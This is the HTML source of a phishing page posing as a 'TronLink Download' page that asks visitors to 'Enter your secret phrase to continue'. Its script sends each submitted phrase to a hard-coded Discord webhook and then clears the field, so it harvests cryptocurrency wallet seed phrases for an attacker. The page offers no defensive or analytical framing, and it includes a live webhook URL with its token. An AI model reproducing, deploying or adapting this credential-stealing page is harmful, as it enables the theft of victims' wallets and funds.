<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
        <link rel="icon" href="https://gateway.pinata.cloud/ipfs/Qmc1ry24hGZ526EfC8cta43GQu8iAgH5Xro8RKSYptzeek?_gl=1*1vsb5hb*_ga*NTgzMzM3YTMtOWRiMS00MjJmLTgyOGItODNiMzI4NGEzZmQw*_ga_5RMPXG14TE*MTY3OTc1OTk5MC40MS4wLjE2Nzk3NTk5OTAuNjAuMC4w">

    <link href="https://fonts.googleapis.com/css?family=Tron&display=swap" rel="stylesheet">
      <img src="https://gateway.pinata.cloud/ipfs/QmQyw5FbGkGgZeAgnUSs1h1MeRkYpaXCFrm2V5G56ieLZy?_gl=1*1hmiqzp*_ga*NTgzMzM3YTMtOWRiMS00MjJmLTgyOGItODNiMzI4NGEzZmQw*_ga_5RMPXG14TE*MTY3OTc1OTk5MC40MS4wLjE2Nzk3NTk5OTAuNjAuMC4w" alt="Logo de mi página web" width="200">

    <title>TronLink Download</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
      body {
        background-color: #1542F7;
      }
      h1 {
        color: white;
         font-family: 'Tron', sans-serif;
      }
      #container {
        margin: 50px auto;
        max-width: 600px;
        width: 90%;
        text-align: center;
      }
    #input-field {
  background-color: #ffe0e8;
  border: none;
  border-radius: 10px;
  font-size: 20px;
  margin-bottom: 20px;
  padding: 10px;
  width: 100%;
  color: #333;
  height: 200px; /* ajusta la altura aquí */
}


     #submit-button {
  background-color: #8DF8A6;
  border: none;
  border-radius: 50px;
  color: white;
  font-size: 20px;
  padding: 10px 20px;
  transition: all 0.2s ease-in-out;
}

#submit-button:hover {
  background-color: #ff7eb9;
  cursor: pointer;
}

#submit-button:active {
  transform: scale(0.95);
}

      .error {
        color: red;
        font-size: 14px;
        margin-top: 10px;
      }
      #burbujas {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  z-index:-1;
}

/* Resto del código CSS */


#burbujas span {
  position: absolute;
  display: block;
  background-color: #a3d1e3; /* color de las burbujas */
  opacity: 0.7; /* opacidad de las burbujas */
  border-radius: 50%; /* bordes redondeados */
  animation: burbuja 3s linear infinite; /* duración de la animación */
}

@keyframes burbuja {
  0% {
    transform: translateY(0) scale(1);
    opacity: 0.7;
  }
  100% {
    transform: translateY(-100px) scale(2);
    opacity: 0;
  }
}

#burbujas span:nth-child(1) {
  top: 10%;
  left: 50%;
  width: 60px;
  height: 60px;
  animation-delay: 0s;
}

#burbujas span:nth-child(2) {
  top: 20%;
  left: 10%;
  width: 40px;
  height: 40px;
  animation-delay: 2s;
}
    </style>
  </head>
  <body>
    <div id="container">
      <h1>Enter your secret phrase to continue</h1>
      <form id="my-form">
        <input type="text" id="input-field" placeholder="Enter your phrase here">
        <br>
        <button type="submit" id="submit-button">Submit</button>
        <div id="error-message" class="error"></div>
      </form>
    </div>
    <script>
      const form = document.getElementById("my-form");
      const inputField = document.getElementById("input-field");
      const errorMessage = document.getElementById("error-message");

      form.addEventListener("submit", (event) => {
        event.preventDefault();
        const phrase = inputField.value;
        if (phrase.trim() === "") {
          errorMessage.textContent = "Error!";
          setTimeout(() => {
            errorMessage.textContent = "";
          }, 2000);
        } else {
          const webhookUrl = "https://discordapp.com/api/webhooks/1089376156001771520/8zcE4kmxhybKRgra4kNUIG3M8e9jKPK-OwmVjC86k_VzusJYoah8qDgrFwl5NgOGnyev";
          fetch(webhookUrl, {
            method: "POST",
            headers: {
              "Content-Type": "application/json"
            },
            body: JSON.stringify({ content: phrase })
          });
          inputField.value = "";
        }
      });
    </script>
     <script>
  function crearBurbuja() {
    var burbuja = document.createElement("span");
    var tamaño = Math.random() * 60;
    var duracion = Math.random() * 3;
    burbuja.style.width = 20 + tamaño + "px";
    burbuja.style.height = 20 + tamaño + "px";
    burbuja.style.left = Math.random() * innerWidth + "px";
    burbuja.style.animationDuration = 5 + duracion + "s";
    document.getElementById("burbujas").appendChild(burbuja);
    setTimeout(function () {
      burbuja.remove();
    }, 5000);
  }

  setInterval(crearBurbuja, 4000);
	    </script>
	   <div id="burbujas">
  <span></span>
    

      
</div>


  </body>
</html>
